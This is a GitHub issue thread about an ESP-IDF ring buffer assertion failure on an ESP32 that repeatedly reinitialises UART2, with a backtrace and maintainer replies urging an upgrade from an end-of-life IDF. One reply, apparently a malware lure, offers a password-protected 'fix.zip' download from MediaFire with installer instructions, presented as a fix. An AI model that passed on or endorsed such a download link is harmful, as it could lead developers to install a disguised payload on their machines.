espressif/esp-idf #14446: Assert Failed in Ringbuffer When Reading from UART - esp_ringbuf/ringbuf.c:1038

gulkanguner, 2024-08-26:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

v2.14.0-32-gd0656fb

### Espressif SoC revision.

94:3c:c6:28:da:d0

### Operating System used.

macOS

### How did you build your project?

Command line with CMake

### If you are using Windows, please specify command line type.

None

### Development Kit.

Custom Board (with ESP32-WROOM-32)

### Power Supply used.

Battery

### What is the expected behavior?

The UART data should be read without any errors or assertion failures.

### What is the actual behavior?

After about 8 hours, the program crashes with the error mentioned above.

### Steps to reproduce.

1. Initialize UART2 with sensor1 pins (IO25/IO26) at 9600 baud rate.
2. Read data from UART2 (sensor1).
3. Flush and delete UART2.
4. Initialize UART2 with sensor2 pins (IO18/IO23) at 115200 baud rate.
5. Read data from UART2 (sensor2).
6. Flush and delete UART2.
7. Repeat this process every 30 seconds.

### Debug Logs.

```plain
/Users/gulkanguner/esp/esp-idf/components/esp_ringbuf/ringbuf.c:1038 (xRingbufferGetMaxItemSize)- assert failed!

abort() was called at PC 0x400865cb on core 0

ELF file SHA256: a7c698dd64f6fa2889198f9272978ffc74e462b13d2b07432887cebe523dd56e

Backtrace: 0x40086b1c:0x3ffcbfd0 0x40086d0d:0x3ffcbff0 0x400865cb:0x3ffcc010 0x400dcc42:0x3ffcc030 0x400dd50d:0x3ffcc070 0x400f6b89:0x3ffcc0a0 0x400f6d69:0x3ffcc1d0 0x400f6df9:0x3ffcc1f0 0x400ede20:0x3ffcc210 0x400eed82:0x3ffcc370 0x400e2030:0x3ffcc390 0x400e227e:0x3ffcc500 0x400e2313:0x3ffcc520 0x40086f31:0x3ffcc540
```

### More Information.

The issue is temporarily resolved when the device is reset or after it wakes up from sleep mode.

CosionMa, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

AxelLin, 2024-08-27:
> ### IDF version.
> v3.3.1

This is already EOL, you need to update your IDF.

louielauanu, 2024-08-28:
Hi @gulkanguner , as Axel mentioned, IDF v3.3.1 is EoL. Can you try moving to a newer IDF version, for example the latest v5.3 to see if such issue still exists?

closed 2024-09-10 by Alvin1Zhang